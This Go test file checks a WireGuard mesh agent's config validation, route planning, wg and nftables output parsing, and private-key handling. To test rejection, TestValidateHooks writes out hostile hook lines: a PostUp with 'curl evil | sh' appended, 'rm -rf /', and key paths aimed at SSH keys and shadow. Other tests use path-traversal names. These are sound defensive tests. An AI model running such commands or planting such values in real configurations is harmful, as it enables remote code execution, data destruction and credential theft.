package main

import (
	"strings"
	"testing"
)

const sampleConf = `# Generated by OPNmesh v2
# gateway: dc

[Interface]
Address = 10.99.0.1/24
ListenPort = 51820
MTU = 1420
PostUp = wg set %i private-key /etc/opnmesh/private.key

[Peer]
# site: office
PublicKey = rjqlrC7N/QsK15DjL/JKh/5ezM35+ZP6mJH/jqO7bl4=
Endpoint = office.example.com:51820
AllowedIPs = 10.99.0.2/32, 192.168.20.0/24, 10.99.1.10/32

[Peer]
# client: alice
PublicKey = HjlonIkFUXpUAi3WRfPd1XFHtdiGea8FAQIjkb3c1lA=
AllowedIPs = 10.99.1.11/32
`

func TestValidateHooks(t *testing.T) {
	if err := validateHooks(sampleConf, "/etc/opnmesh"); err != nil {
		t.Fatalf("sanctioned PostUp rejected: %v", err)
	}
	bad := []string{
		"[Interface]\nPostUp = wg set %i private-key /etc/opnmesh/private.key; curl evil | sh\n",
		"[Interface]\nPreUp = /bin/true\n",
		"[Interface]\nPostDown = rm -rf /\n",
		"[Interface]\nPostUp = wg set %i private-key /root/.ssh/id_rsa\n",
		"[Interface]\nPostUp = wg set %i private-key /etc/opnmesh/../shadow\n",
		"[Interface]\nPrivateKey = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=\n",
	}
	for _, c := range bad {
		if err := validateHooks(c, "/etc/opnmesh"); err == nil {
			t.Errorf("accepted dangerous config:\n%s", c)
		}
	}
}

func TestIsManagedFile(t *testing.T) {
	for _, ok := range []string{"wireguard.conf", "nftables.conf", "sysctl.conf"} {
		if !isManagedFile(ok) {
			t.Errorf("%s should be managed", ok)
		}
	}
	for _, bad := range []string{"../etc/cron.d/x", "wireguard.conf/../x", "agent.json", "private.key", ""} {
		if isManagedFile(bad) {
			t.Errorf("%s must not be managed", bad)
		}
	}
}

func TestInterfaceSectionAndValues(t *testing.T) {
	sec := interfaceSection(sampleConf)
	if !strings.Contains(sec, "ListenPort = 51820") || strings.Contains(sec, "PublicKey") {
		t.Fatalf("bad interface section: %q", sec)
	}
	peersOnly := strings.Replace(sampleConf, "10.99.1.11/32", "10.99.1.12/32", 1)
	if interfaceSection(peersOnly) != sec {
		t.Fatal("peer edit changed the interface section")
	}
	if interfaceSection(strings.Replace(sampleConf, "51820", "443", 1)) == sec {
		t.Fatal("port change not detected")
	}
	if listenPortOf(sampleConf) != 51820 {
		t.Fatalf("listen port: %d", listenPortOf(sampleConf))
	}
}

func TestAllowedPrefixesAndTunnelIPs(t *testing.T) {
	p := allowedPrefixes(sampleConf)
	for _, want := range []string{"10.99.0.2", "192.168.20.0/24", "10.99.1.10", "10.99.1.11"} {
		if !p[want] {
			t.Errorf("missing prefix %s in %v", want, p)
		}
	}
	if len(p) != 4 {
		t.Errorf("unexpected prefixes: %v", p)
	}
	ips := peerTunnelIPs(sampleConf)
	if ips["rjqlrC7N/QsK15DjL/JKh/5ezM35+ZP6mJH/jqO7bl4="] != "10.99.0.2" {
		t.Errorf("office tunnel ip: %v", ips)
	}
	if ips["HjlonIkFUXpUAi3WRfPd1XFHtdiGea8FAQIjkb3c1lA="] != "10.99.1.11" {
		t.Errorf("client tunnel ip: %v", ips)
	}
}

func TestRoutePlan(t *testing.T) {
	current := []ipRoute{
		{Dst: "10.99.0.0/24", Protocol: "kernel"}, // connected: covers the /32 tunnel addresses
		{Dst: "192.168.20.0/24", Protocol: "boot"},
		{Dst: "10.50.0.0/24", Protocol: "boot"}, // stale
		{Dst: "10.99.1.10", Protocol: "boot"},
	}
	desired := allowedPrefixes(sampleConf)
	add, del := routePlan(desired, current)
	if strings.Join(add, ",") != "10.99.1.11" {
		t.Errorf("add = %v", add)
	}
	if strings.Join(del, ",") != "10.50.0.0/24" {
		t.Errorf("del = %v", del)
	}
	// A desired prefix wider than the connected route is not "covered".
	add, _ = routePlan(map[string]bool{"10.99.0.0/16": true}, current)
	if strings.Join(add, ",") != "10.99.0.0/16" {
		t.Errorf("wider prefix should be added: %v", add)
	}
}

func TestParseRoutes(t *testing.T) {
	routes, err := parseRoutes(`[{"dst":"10.99.0.0/24","protocol":"kernel","scope":"link","prefsrc":"10.99.0.1","flags":[]},{"dst":"192.168.20.0/24","scope":"link","flags":[]}]`)
	if err != nil || len(routes) != 2 || routes[0].Protocol != "kernel" || routes[1].Dst != "192.168.20.0/24" {
		t.Fatalf("parse: %v %+v", err, routes)
	}
	if r, err := parseRoutes(""); err != nil || len(r) != 0 {
		t.Fatalf("empty: %v %v", err, r)
	}
}

func TestParseWgDump(t *testing.T) {
	dump := "privkey\tpubkey\t51820\toff\n" +
		"rjqlrC7N/QsK15DjL/JKh/5ezM35+ZP6mJH/jqO7bl4=\t(none)\t203.0.113.20:51820\t10.99.0.2/32,192.168.20.0/24\t1757000000\t12345\t67890\toff\n" +
		"HjlonIkFUXpUAi3WRfPd1XFHtdiGea8FAQIjkb3c1lA=\t(none)\t(none)\t10.99.1.11/32\t0\t0\t0\toff\n"
	peers := parseWgDump(dump)
	if len(peers) != 2 {
		t.Fatalf("peers: %+v", peers)
	}
	if peers[0].Endpoint != "203.0.113.20:51820" || peers[0].LatestHandshake != 1757000000 || peers[0].RxBytes != 12345 || peers[0].TxBytes != 67890 {
		t.Errorf("peer 0: %+v", peers[0])
	}
	if peers[1].Endpoint != "" || peers[1].LatestHandshake != 0 {
		t.Errorf("peer 1: %+v", peers[1])
	}
}

func TestParseNftCounters(t *testing.T) {
	js := `{"nftables":[{"metainfo":{"version":"1.0.9"}},{"counter":{"family":"inet","name":"c_dc_to_office","table":"opnmesh","handle":5,"packets":10,"bytes":1234}},{"counter":{"family":"inet","name":"c_office_to_dc","table":"opnmesh","handle":6,"packets":0,"bytes":0}}]}`
	c, err := parseNftCounters(js)
	if err != nil || len(c) != 2 || c[0].Name != "c_dc_to_office" || c[0].Bytes != 1234 || c[0].Packets != 10 {
		t.Fatalf("counters: %v %+v", err, c)
	}
}

func TestHashFilesMatchesController(t *testing.T) {
	// The controller computes sha256 over "name\0content\0" in sorted name order.
	got := hashFiles(map[string]string{"wireguard.conf": "w", "nftables.conf": "n", "sysctl.conf": "s"})
	// Computed with the controller's implementation (src/core/generate/index.ts hashFiles).
	want := "b7f0618d0fa3aeb3718519d0dd9f9460d23d70354487eb614825dc81b05e07ba"
	if got != want {
		t.Fatalf("hash mismatch with controller: got %s want %s", got, want)
	}
	if hashFiles(map[string]string{"a": "1"}) == hashFiles(map[string]string{"a": "2"}) {
		t.Fatal("content must affect the hash")
	}
}

func TestPrivateKeyPathAndInjection(t *testing.T) {
	if p := privateKeyPathOf(sampleConf); p != "/etc/opnmesh/private.key" {
		t.Fatalf("key path: %q", p)
	}
	if p := privateKeyPathOf("[Interface]\nListenPort = 1\n"); p != "" {
		t.Fatalf("expected empty key path, got %q", p)
	}
	stripped := "[Interface]\nListenPort = 51820\n\n[Peer]\nPublicKey = x\n"
	got := injectPrivateKey(stripped, "KEY=\n")
	want := "[Interface]\nPrivateKey = KEY=\nListenPort = 51820\n\n[Peer]\nPublicKey = x\n"
	if got != want {
		t.Fatalf("inject:\n%s", got)
	}
	if injectPrivateKey(stripped, "") != stripped {
		t.Fatal("empty key must not change the config")
	}
	if got := injectPrivateKey("[Peer]\nPublicKey = x\n", "K"); !strings.HasPrefix(got, "[Interface]\nPrivateKey = K\n") {
		t.Fatalf("missing interface section not handled: %q", got)
	}
}

func TestValidInterfaceName(t *testing.T) {
	for _, ok := range []string{"opnmesh0", "wg0", "mesh-a", "a"} {
		if !validInterfaceName(ok) {
			t.Errorf("%q should be valid", ok)
		}
	}
	for _, bad := range []string{"", "0abc", "toolongname12345", "has space", "../x", "Upper"} {
		if validInterfaceName(bad) {
			t.Errorf("%q should be invalid", bad)
		}
	}
}
